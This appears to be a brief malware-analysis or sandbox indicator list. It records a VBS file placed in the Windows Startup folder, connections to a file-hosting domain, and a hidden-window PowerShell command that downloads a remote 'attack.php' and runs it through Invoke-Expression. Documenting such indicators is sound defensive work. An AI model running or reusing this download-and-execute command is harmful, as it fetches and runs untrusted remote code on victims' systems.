Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.vbs
- https://www.up##ad.ee/download/12854755/8758bfe1dcff18a7a1eb/attack.php
- 'up##ad.ee':443
- 'up##ad.ee':443
- DNS ASK up##ad.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('https://www.up##ad.ee/download/12854755/8758bfe1dcff18a7a1eb/Attack.php')' (with hidden window)